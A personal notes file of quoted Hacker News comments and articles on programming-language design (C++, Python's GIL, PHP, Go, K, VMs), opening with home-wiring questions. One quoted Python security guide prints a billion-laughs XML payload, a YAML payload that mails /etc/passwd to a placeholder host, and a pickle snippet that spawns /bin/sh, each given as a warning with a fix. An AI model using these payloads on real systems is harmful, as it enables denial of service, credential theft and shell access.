proj-oot-ootNotes35

1) as long as we are pulling all that cable, let's pull 4 extras. Also, could we do cat6 instead of cat5? How much would these changes raise the cost?

2) i'd like some outdoor security lighting too. It should be motion-activated, and (mostly) only on at night, and be able to be turned off remotely (for when we want to go outside and have it stay dark). It would be great if it could notify via z-wave or zigbee or IFTTT or a cloud app or whatever when it activated but that's not required. What are the options here? Can some of these products be powered from the POE? Is it best to just attach some sort of motion-activated sensor to some sort of switch to control existing lights? Is it best just to get a Ring spotlight or floodlight camera rather than a standalone lighting product? I recall you mentioned that lights like the Ring floodlight with full AC power would be brighter, do you that level of brightness would be better at deterring intruders? We have some outdoor power outlets in the back and near the electrical panel, it's possible that we could power a couple of Ring floodlight cams via those in addition to or instead of some of the LTS cameras.

---

Aardappel 1 day ago [-]

There should probably be two C++ styleguides: one for library authors and one for library users. For the former, use of std::move can be absolutely essential to abstractions that are both efficient and correct. For the latter, it probably means you're overthinking things.

reply

---

4bpp 23 hours ago [-]

Personal opinions on the "right subset" of C++:

 - I really wish class memory layout were standardised more, but at least some non-standard assumptions are fairly safe in my experience: e.g. class A : B {...} ... B * x; assert((long)static_cast<A* >(x) == (long)x);

 - printf over iostream.

 - (de)allocate classes with new/delete, but POD with malloc/free

 - exception: std::string over char* , because it is really that much more convenient

(I'm very happy to be persuaded otherwise on any of these points.)

reply

doublerebel 16 hours ago [-]

I have been exceptionally surprised and thankful for the coroutine implementation in C++ and its early adoption in Visual C++ compiler (MSVC). UI and I/O code (particularly for Windows) is much easier to both write and comprehend. The stack traces are clear and error handling is simple.

I have professionally worked in many async (and synchronous) languages, and the implementation of async in modern C++ is my favorite. That is weird to type out, but it's true. I'm really enjoying modern C++, but I do follow almost all the rules you list.

reply

thestoicattack 23 hours ago [-]

No std::unique_ptr?

reply

...

int_19h 21 hours ago [-] ... > No to exceptions; their interaction with other language features is awkward, and the eternal difficulties with platform support make me feel no confidence in the reliability of the feature.

If you ditch exceptions, you might as well ditch constructors as well, since there's no way to report errors from them otherwise. You're also forced to use new(nothrow) then. Basically, the language is designed around exceptions, and excluding them is fighting it.

... > printf over iostream.

Not only you lose type safety, but it's extremely easy to write code that kinda sorta works but actually doesn't. The most common case is passing a struct with a single field to printf - this is actually implementation-defined, and some implementations detect it and treat it as invalid, while others just put the contents of the struct on stack. So it happens sometimes that people e.g. pass std::string that way, expecting it to work with %s - and it does... on that one implementation, and for that particular string. Then it breaks elsewhere.

iostream is still bad tho, both design-wise and perf-wise. The answer is actually Boost, which has proper typesafe formatting.

...

> However, avoid situations in which you need dynamic_cast like the plague.

You need dynamic_cast for dynamic interface queries ("does this object support X?"), even in the absence of virtual inheritance.

Some would say that there's no downside to always using it when you can. If what you're doing is an upcast, it's a no-op. If it's a downcast, then at least you get an exception instead of an invalid pointer that may or may not blow up if what you're casting is not of the correct type.

...

4bpp 20 hours ago [-]

> You need dynamic_cast for dynamic interface queries ("does this object support X?"), even in the absence of virtual inheritance.

I prefer using C-style casts for brevity, and implementing support queries like that explicitly (i.e. via a "type" member or GetType?() function or whatever in the base class). Quite often, you wind up needing that information anyway (resulting in redundancy), and the C++ casts are extremely verbose and ugly.

...

> printf over iostream

But printf is so much more legible when you have to format complex strings.

...

> Tuple has syntactic support as of C++17:

Yes, ugly, non-principled syntactic support.

  std::tuple<int,int> a = {1,2}; // { }, like most other instances of lists of things
  auto [x,y] = a; // [ ], for some reason (not used for lists/tuples anywhere else)
  auto [z,w] = {1,2}; // this doesn't work at all

Surely being able to abbreviate B=C; A=B; into A=C; is a sane thing to expect when there is no good reason against it.

...

> If you ditch exceptions, you might as well ditch constructors as well, since there's no way to report errors from them otherwise. You're also forced to use new(nothrow) then. Basically, the language is designed around exceptions, and excluding them is fighting it.

I've worked with a number of embedded platforms that had C++ support without exceptions. As far as I know, there are also still issues when exceptions are thrown through non-C++ stack frames (e.g. a callback invoked from a C library). I'm aware of the problem of errors in constructors, but think that in general it is best to try and write code so that constructors don't do anything that can cause errors (I strongly prefer constructors to only serve the role of putting the object in a coherent state, and having a separate Init function for any nontrivial operations that could fail.)

Memory allocation may be an exception to this, but I feel like code where the sane reaction to OOM is not to treat it as a panic-abort condition is special enough that special measures such as an provisioning an explicit "constructed, but no memory has been acquired" state in your objects are justified.

I really do want exceptions to work - having worked with Standard ML for a long time, I'm well aware of how right they feel as a solution to error handling - but the C++ implementation of them still feels like it ultimately has way too many moving parts to be trustworthy.

---

C vs C++, a guy who switched back to C after using C++:

"I DO miss bits of C++, I miss some of the encapsulation it provides, I miss stack-based objects, and funnily enough, I miss exceptions. But I haven't looked back."

---

mschuetz 1 day ago [-]

I was really looking forward to C++ ranges. However, that blog post by Eric Niebler felt like C++ ranges are trying to get everything right from a cs point of view, but in the process completely ignores usability / legibility, just like the previously introduced list operators that suffer from the requirement to specify start and end iterators. Some of the code samples are an atrocity. That C# example looks so much better to read and easier to understand.

reply

http://ericniebler.com/2018/12/05/standard-ranges/

---

" Go is very opinionated and it's quite obvious that its original design being so radical (no class, no inheritance, no generics, no macro) was only possible because it was designed by a few very experimented people with a very specific goal in mind. "

---

throwaway487549 30 days ago [-]

I would love to have type-clases a-la Haskell (implicits with parametric polymorphism, which is dead-simple and well understood) and universal pattern matching everywhere, but this is, of course, just a dream.

I would love to have ML/Scala-style syntax for curried functions and function definition via pattern-matching with guards, which is also, it seems, out of questions.

Actuall, the more of ML a strict language gets in - the better.

What is really funny is that Bell Labs did a lot of ML research, especially on stdlib, but Go team is ignoring everything which is not of the C flavour. Pity.

Again, ML is absolutely wonderful, and type-classes are the biggest single major innovation since Smalltalk.

It is better to lean towards ML instead of heading towards Javascript.

---

"The HTDP professors want to make clear that the secret sauce is not Scheme, per se. They use a tuned subset of the language, something made possible by the Racket IDE (formerly DrSceme?, now DrRacket?):

    Combining SICP with a GUI-based development environment for Scheme won’t work better than plain SICP. The two keys to our success were to tame Scheme into teaching languages that beginners can handle..."

"SICP had a context: it was designed to be an introductory computer science course designed for university engineering students (including CS)...Anyway, I absolutely agree SICP was never about Scheme per se, or even functional programming. Scheme is nice as a teaching tool because, as Sussman likes to say, you can teach everything you need students to know about the language in one lecture. (Not even all of Scheme, mind you, just what you'd use in a 1-semester course, which back when I took 6.001 meant R4RS minus macros and continuations.)" ---

chubot 7 hours ago [-]

I think there's an analogy between the two issues you brought up.

1. A concurrent garbage collector is 10x more work than a single-threaded one. People often don't realize this.

2. A language-independent VM is 10x more work than a VM for a given language. People often don't realize this this.

In other words, VMs are tightly coupled to the language they implement, unless you make heroic efforts to ensure otherwise.

WebAssembly? is a good example of #2. I think the team is doing a great job, but they are inevitably caught between the constraints of different languages (GC, exceptions, etc.)

The recent submission The Early History of F# sheds some light on this with respect to the CLR:

https://news.ycombinator.com/item?id=18874796

An outreach project called “Project 7” was initiated: the aim was to bring seven commercial languages and seven academic languages to target Lightning at launch. While in some ways this was a marketing activity, there was also serious belief and intent. For help with defining the academic languages James Plamondon turned to Microsoft Research (MSR).

I think this is the only way to design a language-independent VM -- port a whole bunch of languages to it. And there are probably 4 or 5 companies in the world with the resources to do this.

I've seen some VM designs that aim to be generic, but since they were never tested, the authors are mistaken about the range of languages they could efficiently support.

Of course, you can always make a language run on a given VM, but making it run efficiently is the main problem.

reply

pdpi 9 hours ago [-]

> I'd love to see a better separation of language and VMs. I think it's a bit sad that a language designer has to either implement their runtime system from scratch, or has to run it on top of a VM that was designed for another language (Java in the case of Jython).

Wasn't Perl 6's Parrot kind of meant to fulfil that role?

reply

---

std_throwawayay 10 hours ago [-]

The GIL comes with great convenience as you don't have to worry about a whole host of data races. It's no silver bullet but it's mighty convenient if you only do some multi-threading like in a web-server.

Many libraries are not prepared for the disappearance of the GIL and while it's not a general problem for python per se it will be a great amount of work to make every library compatible with GILless python.

Therefore I think that you must always provide an option for the GIL that is enabled by default in order to provide backward compatibility.

reply

std_throwawayay 4 hours ago [-]

Right now you have one mutex for everything (the GIL itself) and everything else doesn't need locking. In order to achieve similar convenience without the GIL you would have to trade this for one mutex for every single data structure. Because the data structures in python are so flexible, every single variable needs its own mutex then. Locking every single variable access would be enormously costly.

Other languages achieve a good compromise by clustering data structures into fewer parts with only a handful of mutexes that are locked while other threads work on different datasets. This is usually done manually and with great care as it is the heart of both safety and performance. I don't know if there is an automatic solution to this problem that is compatible with the way python programs are structured.

The libraries basically assume that, while you call them, nothing else changes. In order to ensure that you need to lock everything down. Because you don't know what these libraries do and what data they access it needs to be everything (like it is today). It should be possible to only lock the GIL when such a library is called, so there should be kind of a middle way forward.

reply

loeg 6 hours ago [-]

It's basically impossible to implement a CPython-compatible language without a GIL (or you lose single thread performance by using very fine-grained atomics/locking). Python has very specific multithreading semantics that are a function of the CPython bytecode and the GIL, and programs rely on this.

reply

int_19h 3 hours ago [-]

Other than refcounting (which is not a part of the Python language spec - it even specifically says that conforming code shouldn't rely on it), what other semantics did you have in mind?

reply

sametmax 3 hours ago [-]

You can list.append from 2 threads without worrying about crashing, although I would not recommend it.

It's possible to do without the GIL, but up to now, it's been a damn to way of doing that.

reply

woolvalley 5 hours ago [-]

I would personally try to move away from python at this point for greenfield projects. The GIL is so baked into the language, if you removed it a bunch of current python code will probably break in subtle ways.

Modern languages need proper multithreading support, static types and fast compile speeds. Use golang, use kotlin, use dart, use anything but python & javascript.

reply

---

trixie_ 11 hours ago [-]

Each PHP file is an endpoint. As opposed to having routers in code or client side SPA routing.

PHP files can be deployed independently, swapped out or updated live.

No building/compiling of the php files needed.

A single layer as opposed to 'modern architecture' where there's client side back/front end layers, api layer, logic, validator, data access, and ORM layers.

Can extend itself as it runs. For example Wordpress, running off of php files can download plugins to its own server (which are just more php files) to instantly extend itself. Without restarting or redeployment. (What other web platforms can do this?)

Intuitive, simple, powerful. Can be as easy as editing a php file in notepad and dropping it on a ftp server. Deployed.

Amazon lambda may have more in common with PHP in terms of discreet deployable units of functionality. What's old is new again.

Compiling/deploying an entire system to change a single endpoint feels backwards after using PHP.

reply

viraptor 9 hours ago [-]

> Each PHP file is an endpoint. As opposed to having routers in code or client side SPA routing.

Which becomes a security issue due to accidental endpoints or uploads becoming endpoints. Or becomes a mess of imports. Either way, PHP frameworks often end up with a central router anyway.

> PHP files can be deployed independently, swapped out or updated live.

Which means some people try to do that the naive way and end up breaking a few requests that happen during the deployment.

> Can be as easy as editing a php file in notepad and dropping it on a ftp server.

Which causes https://stackoverflow.com/search?q=headers+already+sent+bom&... because people don't realise they had an invisible character before all the code.

I really don't think any of those are a good thing.

reply

mnutt 4 hours ago [-]

Even worse, Tumblr had an incident where they accidentally changed <?php to i?php (my guess would be editing directly on the server with vim?) and exposed not only their source code but also credentials.

https://news.ycombinator.com/item?id=2343351

It would have been possible for tumblr to avoid this with good development practices (don’t edit code live, don’t bake credentials into code, etc) but I imagine there was a culture of doing it at the time.

I don’t think it’s fair to tell developers “use our language, it’s super easy!” and then expect them to discard all of those bad habits as they start putting things in production.

reply

tptacek 12 hours ago [-]

For the kinds of applications people tend to build in PHP, PHP is probably a better choice than Go. I'd still do Django or Rails before PHP, but Go just isn't designed to make serverside-rendered database-backed websites especially pleasant to write.

reply

steve19 12 hours ago [-]

I have not written a new PHP app in years but recently I had a look at the latest and greatest from the PHP community and its pretty good. The frameworks and tooling look about as good as you will get anywhere and PHP appears to be fast now.

reply

joaodlf 7 hours ago [-]

I love Go, for many situations, but definitely not for a typical user facing website.

The community seems bent on the whole "all you need is net/http", but that just isn't practical in modern web development. People like ORMs, easy to handle html forms, security as a default, easy session/cookie handling etc. In the end, web developers want ease of life.

Go is a great language for many things, but if it's going to take on the web at large (outside of HTTP APIs), the community needs to grow out of this "net/http or nothing" approach.

There is some hope, some frameworks like https://gobuffalo.io/en are showing up, but the Go ecosystem is dying for a Rails/Django solution.

reply

---

letientai299 1 day ago [-]

Came from Java world, I find the Go comment and godoc are really limited. We can't link between functions, types. We don't have a standard way to declare input, output, don't have any distinction between a normal word and a Go identifier Refactoring using tool (e.g: Goland) usually lead to unexpected text replacements.

Take following functions, for example:

  // Auth check if user credential is existed in bla, bla...
  // ... (many more explanation)
  Auth(user User, authProvider AuthProvider) bool
  // AuthDefault check user against the default **AuthProvider**
  AuthDefault(user User) bool {
    return Auth(user, new(DefaultAuthProvider))
  }

If only the AuthProvider? in the second function's godoc be a link to the first one, we don't have to repeat the explanation for the second one. Dev will be able to discover the explanation easily via their IDE. This alone will be very helpful for the maintainability of any big projects.

reply

dilap 1 day ago [-]

Flip-side is less complexity and the doc comments in raw code look better. Go's generally all about, "how much can we strip away and still have things work".

Your criticisms re refactorings and links are on point though.

Trade-offs.

reply

adamlett 20 hours ago [-]

The problem with the Java way, as I see it, is that it puts more of a burden on the programmer to the point where a majority simply won't do it. Getting programmers to document their code is an uphill battle to begin with. But the bureaucracy that Java(doc) imposes makes it even harder to win in all but the most elite institutions. What I see a lot, is IDE-generated documentation which can be automatically inferred from the code, and is therefore redundant. While it superficially looks like documentation, it really is just line noise. I would agree that Java documentation at its best can be better than Go documentation. But I suspect that the average Go codebase is better documented than the average Java codebase.

reply

---

"New languages are usually a grab-bag of features found in C, Java, Lisp and/or Haskell." -- [1]

---

" gpu.js relies on the assumption that the kernel function is using only a subset of legal JavaScript? syntax:

    1D, 2D, 3D array of numbers or just numbers as kernel input
    1D, 2D, 3D array of numbers as kernel output
    Number variables
    Custom and custom native functions
    Arithmetic operations (+, +=, -, *, /, %)
    Javascript Math functions (Math.floor() and etc.)
    Loops
    if and else statements
    const and let
    No variables captured by a closure

"

--- "

Although we mourn Midori, it can still teach us broadly applicable, deep lessons. (See especially A Tale Of Three Safeties and The Error Model.) https://en.wikipedia.org/wiki/Midori_(operating_system) http://joeduffyblog.com/2015/11/03/blogging-about-midori/ http://joeduffyblog.com/2015/11/03/a-tale-of-three-safeties/ http://joeduffyblog.com/2016/02/07/the-error-model/

" -- [2]

---

having a package repo is pretty important so that we can steal Rust's trick of analyzing the effect of language changes on diverse, actual code.

--- "

" -- [3]

---

" 4.3.Concrete suggestions ...

-- [4]

---

noir_lord 60 days ago [-]

What a beautifully written article with informative links.

http://lucacardelli.name/Papers/TypefulProg.pdf is now next on my list when I finish reading A Philosophy of Software Design (which is brilliant if you haven't seen it).

nickpsecurity 59 days ago [-]

Cardelli's Modula-3, a C++ alternative, also illustrates excellent balance of simplicity, programming in large, compile time, and run time. Expanding on that carefully like with macros, a borrow checker, and LLVM integration would have made for a simpler, safer, systems language. Give it a C-like syntax with C compatibility, too, for adoption.

https://en.m.wikipedia.org/wiki/Modula-3

pjmlp 59 days ago [-]

You mean C# I guess. :)

Actually with .NET Native, the GC improvements in .NET 4.6 (TryStartNoGCRegion?() and other companion methods), and the C# 7.x improvements taken from Midori, it is quite close.

nickpsecurity 59 days ago [-]

C# looked a lot more complex than Modula-3 when I last looked at it. The book was thick. They definitely did nice things in C#. I just don't know it's fair to equate it with the simplicity vs get shit done vs small runtime of Modula-3.

I am up for you elaborating a bit on the second sentence since it sounds interesting. Not doing .NET, I don't know what any of those are except the middle one which sounds like SYSTEM/UNSAFE sections.

pjmlp 59 days ago [-]

It is more complex, but Modula-3 isn't that tiny either, around Algol 68/Ada 83 "tiny".

They integrated the improvements from M#/System C# (Midori) into C#.

Namely return ref, ref for local variables, stack allocation for arrays in safe code, spans (slices) across all memory types, allocation free pipelines.

---

64k addressable neurons is enough because it's not like each neuron in the cortex can address every other neuron in the cortex

---

acheron 35 minutes ago [-]

"Javascript Delenda Est", by zeveb, https://news.ycombinator.com/item?id=11447851 :

> Can we please try to stop talking about this specific language ecosystem as an awful deplorable hell hole or whatever?

Back in the second century BC, Cato the Elder ended his speeches with the phrase 'Carthago delenda est,' which is to say, 'Carthage must be destroyed.' It didn't matter what the ostensible topic of the speech was: above all, Carthage must be destroyed.

My opinion towards JavaScript? is much like Cato's towards Carthage: it must be rooted out, eliminated and destroyed entirely. I don't know if I'd go quite so far as to say that the fundamental challenge of mass computing is the final destruction of JavaScript? — but I want to say it, even though it's false.

JavaScript? is a pox, a disaster, a shame. It is the most embarrassingly bad thing to become popular in computing since Windows 3.1. Its one virtue (that it's on every client device) is outshone by its plethora of flaws in much the same way that a matchstick is outshone by the sun, the stars and the primordial energy of the Big Bang added together.

JavaScript? is the XML, the Yugo, the Therac-25 of programming languages. The sheer amount of human effort which has been expended working around its fundamental flaws instead of advancing the development of mankind is astounding. The fact that people would take this paragon of wasted opportunity and use it on the server side, where there are so many better alternatives (to a first approximation, every other programming language ever used), is utterly appalling.

JavaScript? delenda est.

reply

---

"I try to optimize my code around reducing state, coupling, complexity and code, in that order." [5]

---

a meta-circulatar interpreter for a small subset of prolog:

https://news.ycombinator.com/item?id=19294191

---

postscript for a hypercard-like system. Other comments on postscript, homoiconicity:

https://news.ycombinator.com/item?id=18314265

---

terminals

https://news.ycombinator.com/item?id=16014573

---

this looks pretty awesome:

https://github.com/cool-RR/pysnooper

---

"The two most important novelties in K with respect to APL were replacing arrays with heterogeneous lists as the most fundamental data structure and the use of functions with arbitrary number of arguments." [6]

i guess i like hetero lists, but not variadic functions

"Another distinguishing feature of K is the use of dictionaries: associative tables whose keys are symbols, i.e., internalized strings. In turn, dictionaries are the building material of a hierarchically organized global data space called the K-tree."

i think the K-tree is just something like the lexically-scoped environment?

---

"Although there is no distinguishing of verbs by ranks of application other than being atomic or non-atomic (unlike J, where verbs do have ranks associated with them), the level of nesting at which a verb applies can be controlled by modifying the verb by means of adverbs (see the Examples section below)." [7]

---

i don't like this in K:

"Almost all verbs are monadic or dyadic, and most verb designators are ambivalent, having, as in APL and J, both monadic and dyadic meanings.

In general, non-alphanumeric characters are being heavily overloaded. " -- [8]

Apparently the creator of K didn't either; he got rid of it in a later version, Q [9]

---

In K, hofs are not first-class (unlike Haskell and Oot): "As with J and some APLs, grammatical terms such as noun, verb, and adverb are used to describe K, although K does not go as far as J in this respect. A program entity that can be immediately executed is either a verb or a function: it applies to nouns (data items) to produce nouns. An adverb is a meta-, or higher-order function which applies to a verb, function or noun to produce a new verb or function. There are only six predefined adverbs and (unlike J) there is no provision for user-defined ones. " -- [10]

---

" An executing K program can load from files subroutines, in K source or compiled, in order to extend itself dynamically. " -- [11]

---

some other features removed in K4/Q compared to K3:

" Nested functions in K4 and q cannot refer to surrounding function's local variables. (Often, the lack of this ability can be circumvented by making use of function projection.) The support for GUI is dropped from K4 (and q). Also removed is the possibility to attach attributes to data objects. " -- [12]

the first appears to be Python-style closures, and the last appears to be like my attach-metadata-to-graph-nodes idea. Interesting that the K guy ultimately didn't like them after trying them for so long.

---

" the means that the language provides for combining simple ideas to form more complex ideas. Every powerful language has three mechanisms for accomplishing this:

    primitive expressions, which represent the simplest entities the language is concerned with,
    means of combination, by which compound elements are built from simpler ones, and
    means of abstraction, by which compound elements can be named and manipulated as units. 

In programming, we deal with two kinds of elements: procedures and data. (Later we will discover that they are really not so distinct.

...

Expressions

...

Naming and the Environment

...

We have identified in Lisp some of the elements that must appear in any powerful programming language:

    Numbers and arithmetic operations are primitive data and procedures.
    Nesting of combinations provides a means of combining operations.
    Definitions that associate names with values provide a limited means of abstraction. 

Now we will learn about procedure definitions

...

" -- [13]

---

" Idan Arye

The number one problem that makes a bad language is pitfalls. I define pitfalls as potential bugs that tend to get exposed only after they’ve done some damage. Usually because:

    It makes sense to expect it to work.
    It works in the simple cases.
    It doesn’t work in more complex cases.
    Once you found out it doesn’t work, you have already integrated it in your code – so you need to do lots of refactoring to fix it.

There are other reasons to not like a language, but most of them are a matter of personal taste. But I think everyone would agree that pitfalls are bad. "

---

" Darren Burns Jan 25

Features I like:

    First-class support for package management. When I install a programming language and can't work out within the first hour how to install a 3rd party library I really lose interest. Being able to do something like pip install library_name and for it to just work™ is awesome.
    Error message output for humans. Elm and Rust spring to mind.
    Expression-based languages that let you do something like let x = if something { 1 } else { 2 }.
    Pattern matching (Elixir, Rust, Scala, etc.).
    Languages that explicitly avoid the concept of exceptions and try/catch. Managing a single means of passing values up to a caller is hard enough, so I like the idea of encoding errors in the return value. Rust does this by way of the Result type. In Elixir, you return a tuple which includes information on whether an error occurred.
    match statements like in Rust and Scala that support pattern matching. Bonus points if the compiler enforces that matches are exhaustive.
    Any form of null-safety (e.g. Option types, Elvis operator, etc.). I see a lot of Java code with nested if (variable != null) { ... } checks and find it really hard to read.
    Solid abstractions around concurrency (Actor model, Goroutines etc, compiler-enforced safety guarantees like those in Rust, etc.)
    Quality of life features around debugging (for example, in the latest Rust version, you can do dbg!(something) to print out an object and all of its data without having to implement a toString or similar)
    Native async/await syntax
    If the language is dynamically typed, some form of type annotation syntax to aid static analysis is really helpful. Python 3 has a typing module which you can use in conjunction with static analysis and I've found it to make code significantly more readable and correct.
    The ability to compile to a native binary.

Features I dislike:

    null, NullPointerException, etc.
    Bloated standard libraries. With a first-class, well supported package management system, “official” libraries could be pulled in when they’re needed.
    Inconsistent standard libraries (i.e. lack of convention).
    Excessive verbosity. I’m personally not a huge fan of the do/end syntax in languages like Elixir and Ruby. This is super subjective though and with modern text editors/IDEs it just becomes an aesthetic thing.

I could probably go on all day, but those are the first things that spring to mind! "

" Harvey Thompson Jan 25

Add to that:

    Proper static type system with generics, abstract type members, variadic types, tuple types, function types, a sound and complete type system with set-like operations (and, or, not).
    Flow typing: a variables deduced type is refined through flow control.
    Garbage collection (of some kind)
    I agree on no exceptions, use types.
    Compiler-as-a-library
    Macros and other meta-programming
    Incremental compilation
    Interactive prompt
    JIT compilation, AOT compilation and scripting
    Support Language Server Protocol (and check it works in vim, emacs, vscode)
    Support Debugger Access Protocol (which requires a whole debugger, and debug symbol system)
    Support memory, cpu, cache profiling tools out of the box (eg. valgrind et. al)
    Support and/or built-in testing
    Support and/or built-in quality metrics
    Make it open and freely available

"

" Christopher Durham Jan 25

I think the main thing that people look for in a modern "alternative" language is convenience and clarity.

Some specific possibilities:

    Pick a "host" language and offer first-class interop. Immediate library ecosystem! (If non-idiomatic.)
    Along the same lines, first-class project build and dependency management. Either integrate with an existing tool or make it as or more convenient than your favorite.
    REPL. Almost a must-have for quickly understanding a new tool today.
    LSP host and Jupyter kernel. Between the two you can support every development environment and awesome tooling in O(1) effort.

And the fun part, some anti-features:

    Syntax overload. You'll pick up a language faster if you don't have to relearn everything.
    Syntax uncanny valley. If it's too similar to a more popular language, people will just use that instead (or accidentally try to use it instead of yours).
    Near-miss paradigms. Similar to your Java number hiearchy, adopting a paradigm almost everywhere but having some concessions in some corner cases just makes everything feel rougher.

And one more thing: I think there's the most available space around asynchronous-by-default. Play with an async runtime once you're up and running. There's potential there I haven't seen anyone fully hit. "

" Ben Halpern Jan 25

Ruby has a lot of expressive language features that seem like aliases for other things but are actually a bit different.

For example, and, or, and not exist which could be interesting alternatives to &&,

, and ! which are still more common in the language, except they have subtly different behavior so you can't really interchange them per se.

Lots of little ways to cut yourself in that way. REPLY Ben Halpern Jan 25

Oh, and that's also the best feature of the language. It's been crafted to be expressive and intuitive. Not settling for inelegant solutions. Tools like [].empty? and the many, many more are really nice to have.

Of course this all comes with performance and memory bloat concerns but it's still a great tool for many jobs.

"

---

a link about bytecode, not sure if worth reading, so i'll just leave it here:

https://paul.bone.id.au/2018/05/10/bytecode-interpreter/

---

" “Making simple things simple” is a long-term goal of mine. Consider the C++11 range-for loop:

for (int& x : v) ++x; increment each element of the container v

where v can be just about any container. In C and C-style C++, that might look like this:

for (int i=0; i<MAX; i++) ++v[i]; increment each element of the array v

Some people complained that adding the range-for loop made C++ more complicated, and they were obviously correct because it added a feature, but it made the use of C++ simpler. It also eliminated some common errors with the use of the traditional for loop.

Another example is the C++11 standard thread library. It is far simpler to use and less error-prone than using the POSIX or Windows thread C APIs directly. " -- [14]

---

" Register: Finally, what upcoming C++ features do you feel will be most beneficial for C++ users?

Stroustrup:

    Concepts to significantly simplify generic programming
    Parallel algorithms – there is no easier way to use the power of the concurrency features of modern hardware
    Coroutines, if the committee can decide on those for C++20.
    Modules to improve the way organize our source code and dramatically improve compile times. I hope we can get such modules, but it is not yet certain that we can do that for C++20.
    A standard networking library, but it is not yet certain that we can do that for C++20.

In addition:

    Contracts (run-time checked pre-conditions, post-conditions, and assertions) could become significant for many.
    The date and time-zone support library will be significant for many (in industry)." -- [15]

---

" 2. Parsing XML

If your application ever loads and parses XML files, the odds are you are using one of the XML standard library modules. There are a few common attacks through XML. Mostly DoS?-style (designed to crash systems instead of exfiltration of data). Those attacks are common, especially if you’re parsing external (ie non-trusted) XML files.

One of those is called “billion laughs”, because of the payload normally containing a lot (billions) of “lols”. Basically, the idea is that you can do referential entities in XML, so when your unassuming XML parser tries to load this XML file into memory it consumes gigabytes of RAM. Try it out if you don’t believe me :-)

<?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>

Another attack uses external entity expansion. XML supports referencing entities from external URLs, the XML parser would typically fetch and load that resource without any qualms. “An attacker can circumvent firewalls and gain access to restricted resources as all the requests are made from an internal and trustworthy IP address, not from the outside.”

Another situation to consider is 3rd party packages you’re depending on that decode XML, like configuration files, remote APIs. You might not even be aware that one of your dependencies leaves itself open to these types of attacks.

So what happens in Python? Well, the standard library modules, etree, DOM, xmlrpc are all wide open to these types of attacks. It’s well documented https://docs.python.org/3/library/xml.html#xml-vulnerabilities Fix:

Use defusedxml as a drop-in replacement for the standard library modules. It adds safe-guards against these types of attacks.

...

7. Using yaml.load

To quote the PyYAML? documentation:

    “Warning: It is not safe to call yaml.load with any data received from an untrusted source! yaml.load is as powerful as pickle.load and so may call any Python function.”

This beautiful example found in the popular Python project Ansible. You could provide Ansible Vault with this value as the (valid) YAML. It calls os.system() with the arguments provided in the file.

!!python/object/apply:os.system ["cat /etc/passwd

mail me@hack.c"]

So, effectively loading YAML files from user-provided values leaves you wide-open to attack. Demo of this in action, credit Anthony Sottile Fix:

Use yaml.safe_load, pretty much always unless you have a really good reason.

...

8. Pickles

Deserializing pickle data is just as bad as YAML. Python classes can declare a magic-method called __reduce__ which returns a string, or a tuple with a callable and the arguments to call when pickling. The attacker can use that to include references to one of the subprocess modules to run arbitrary commands on the host.

This wonderful example shows how to pickle a class that opens a shell in Python 2. There are plenty more examples of how to exploit pickle.

import cPickle import subprocess import base64

class RunBinSh?(object): def __reduce__(self): return (subprocess.Popen, (('/bin/sh',),))

print base64.b64encode(cPickle.dumps(RunBinSh?()))

Fix:

Never unpickle data from an untrusted or unauthenticated source. Use another serialization pattern instead, like JSON.

...

Have you tried Bandit?

There’s a great static linter that will catch all of these issues in your code, and more!

It’s called bandit, just pip install bandit and bandit ./codedir

" -- [16]

---

nickpsecurity on Apr 3, 2018

parent favorite on: A Visual History of Eve: 2014 - 2018

Definitely more interoperability to get best tool for the job and leverage ecosystems. I'm with you on that. On this...

"they should focus on interoperating with other languages (as in the Unix philosophy)."

Maybe instead follow the OpenVMS? philosophy where they standardized the calling conventions to support multi-language development.

http://h41379.www4.hpe.com/doc/82final/5973/5973pro.html#int...

Microsoft's CLR followed that path in the VM space. Got similarly good results. Tools like Racket and mbase do with DSL's where they share underlying LISP-like language to avoid problems with DSL's own weaknesses.

pjmlp on Apr 3, 2018 [-]

Actually on Windows we have come full circle as those CLR ideas, which were originally thought for COM Runtime, have been brought back into COM as UWP.

IBM mainframes also follow the multi-language environment philosophy.

chubot on Apr 3, 2018 [-]

Yup I mentioned Microsoft COM (which Mozilla's defunct XPCOM was modelled after). Shared libraries and binary interfaces, rather than C header files.

Come to think of it I'd like to see a postmortem on XPCOM.

Chrome uses apparently uses more of a build time tool to generate interfaces in both C++ and JavaScript?.

---

" Does building a VM without a language make sense? I don't know of any successful instances of this approach.

There are lot of hairy corner cases in languages, and VMs reflect that. If you build the VM first, those design decisions may not be obvious, or might come to light a lot later.

I tried compiling Python code to the Lua VM and found that it is extremely coupled to Lua's semantics. That's even more the case with Python's VM. (for example scope rules, module systems, etc.) " -- [17]

---

here's how the LLVM backend deals with WASM's structured programming requirements. Note that the comment at the top says that this transformation assumes that all loops are single entry:

[18]

---

wasm limits:

https://webassembly.github.io/spec/core/appendix/implementation.html#syntactic-limits

---

"

Tim Sweeney ‏ @TimSweeneyEpic?

Here's another thing I believe: The next mainstream programming language (or family of them) will have functional-logic underpinnings like backtracking, unification, and failure. The move will be driven by the improvements in writing code that's concise, correct, and verifiable. 2:58 PM - 1 Apr 2019

Tim Sweeney ‏ @TimSweeneyEpic? Apr 1

Curry is the most-developed FLP language so far. However, it's still sort of a half-way step, which doesn't fully embrace first-class failure (and still exposes boolean ops), and doesn't use backtracking for loop iteration. https://www-ps.informatik.uni-kiel.de/currywiki/

Tim Sweeney ‏ @TimSweeneyEpic? Apr 1

